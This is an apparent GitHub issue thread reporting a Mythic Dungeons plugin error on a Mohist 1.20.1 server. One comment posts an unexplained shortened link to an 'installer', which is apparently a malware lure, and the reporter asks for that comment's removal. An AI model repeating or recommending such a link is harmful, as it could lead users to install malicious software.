### ISSUE TITLE
[1.20.1] Mythic Dungeons Plugin Error

### ISSUE THREAD

**Issue by Talan67** [Teneted/Tenet#3335]
**Minecraft Version :** 1.20.1

**Mohist Version :** 855

**Operating System :** Windows 10

**Concerned mod / plugin** : https://mythiccraft.io/index.php?resources/mythic-dungeons.869/

**Logs :** Debug: https://gist.github.com/Talan67/ae3909b0f726c95cbca0ad7c8393b16d
                Latest: https://gist.github.com/Talan67/ec5cececea455d5a1aedde3f736fa047

**Steps to Reproduce :**
 1. Install Mythic Dungeons and ProtocalLib(Dependancy)
 2. Join Server
 3. Create a procedural dungeon with "/md create <name> procedural"
 4. Create dungeon rooms
 5. save and leave
 6. play the dungeon with "/md play"
 7. Errors...

**Description of issue :** Mythic Dungeons just released there first Dev build of procedural dungeons, the steps described above is the process in which you create a dungeon of this type and how you would attempt to play it.

The issue is that the dungeons generated by the plugin are unable to be played due to an error when attempting to play said dungeon through the command "/md play <name>".

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Talan67** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

can someone remove this person, I have no idea who they are and what they have linked.
